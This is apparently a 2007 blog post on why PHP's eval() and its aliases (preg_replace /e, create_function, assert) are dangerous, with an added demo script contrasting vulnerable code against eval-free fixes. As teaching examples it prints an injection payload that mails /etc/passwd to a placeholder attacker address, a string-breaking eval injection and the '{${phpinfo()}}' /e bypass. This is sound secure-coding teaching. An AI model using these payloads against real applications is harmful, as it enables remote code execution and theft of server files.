PHP eval is evil
December 22, 2007
JSON creator Douglas Crockford has pointed out more than once that, in JavaScript, eval is evil. In PHP, eval is almost always evil too (some people say it is useful in a few limited cases). I personally don't have the guts to use it. Letting any user-supplied data reach an eval( ) call is asking to be hacked.
eval( ) also has aliases. Don't use the /e modifier with preg_replace( ): with /e, preg_replace( ) substitutes the captured matches into the replacement string and then runs that string as PHP code, so any user-entered data in the subject ends up as code. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback( ) does the same job with a normal function instead of eval. create_function( ) and assert( ) called with a string argument evaluate that string as PHP code as well, so the same warning applies to them.
So what does eval do? eval( string $code_str ) evaluates the string in code_str as PHP code, with full access to the script's variables and functions. Imagine you take a form's username field straight into eval($_POST['username']). If the attacker types the following value into the input field: mail("hacker@somewhere.com", "Some passwords", file_get_contents("/etc/passwd")); your server mails its user account list to the attacker, and anything else the web server user can read (a config file holding database credentials, for example) is just as easy to take. Note that the payload is ordinary PHP, semicolon included: whatever the attacker writes, the script executes.
So don’t use eval unless you are suicidal. ;)
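Here is an added example, not code from the original post, that puts the two shapes side by side: request data concatenated into an eval( ) string template, the pre-PHP-7 preg_replace( ) /e pattern, and the eval-free replacements for both. The function names, the constructed payload and the flag it sets are this example's own; the payload only sets a variable so the script runs offline with no side effects.

```php
<?php
// Added example (not code from the original post). Shows the two shapes the
// post warns about, user data reaching eval() and preg_replace() with /e,
// beside eval-free replacements. All inputs are constructed; the "attacker"
// payload only sets a flag. Function names are this example's own.

// 1. Vulnerable: PHP source is built from request data, then eval()'d.
//    The author meant "store the value under this name"; the attacker
//    decides what the generated source actually says.
function set_via_eval(string $name, string $value): array {
    $vars = [];
    eval('$vars["' . $name . '"] = "' . $value . '";');
    return $vars;
}

// 2. Safe: keep data as data. A plain array (or $$name) does the same job
//    without ever turning the input into code. The name is validated against
//    an identifier pattern; the value needs no escaping because it is never
//    parsed.
function set_safely(string $name, string $value): array {
    if (!preg_match('/^[A-Za-z_]\w*$/', $name)) {
        throw new InvalidArgumentException('bad variable name');
    }
    return [$name => $value];
}

// 3. preg_replace() with /e (PHP < 7) ran the replacement as code, e.g.
//      preg_replace('/(.*)/e', 'strtoupper("\\1")', $_POST['title']);
//    Quotes in \1 were backslash-escaped, but a title of {${phpinfo()}} still
//    executes phpinfo() through PHP's "{${expr}}" string interpolation.
//    /e was deprecated in 5.5 and removed in 7.0; a callback has no eval at
//    all, so the braces are just characters.
function upper_safely(string $title): string {
    return preg_replace_callback('/(.*)/', function ($m) {
        return strtoupper($m[1]);
    }, $title);
}

// Constructed attacker value for #1: closes the string and the statement,
// runs arbitrary code, then comments out the rest of the template. In the
// post's scenario the injected statement would be
//   mail("hacker@somewhere.com", "passwd", file_get_contents("/etc/passwd"));
// here it just sets a flag so the demo is harmless.
$payload = '"; $GLOBALS["pwned"] = "injected code ran"; //';

set_via_eval('username', $payload);
var_dump($GLOBALS['pwned'] ?? null);        // flag set by the injected code

var_dump(set_safely('username', $payload)); // same input, stored as a value

var_dump(upper_safely('{${phpinfo()}}'));   // upper-cased text, nothing runs
```

Run it with php and compare the three dumps: the first shows the eval( ) template executed the attacker's statement, the second shows the identical string stored harmlessly as data, and the third shows the /e-style bypass string coming back as plain upper-cased text because no evaluation happens in the callback version.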
Comments
2 Comments so far
I find eval very helpful in variable setting examples, for example:
eval('$this->debug =' . (IS_PHP4 ? '&' : '') . ' new stdClass();');
The only cases where eval is "evil" are where you're inputting user data into eval - but you should be validating and sanitising any user input anyway.
Hi, Ross
In your case it provides convenience and is really helpful. What I mentioned in my post was more about the possible problems eval causes.
I really appreciate your opinion. :)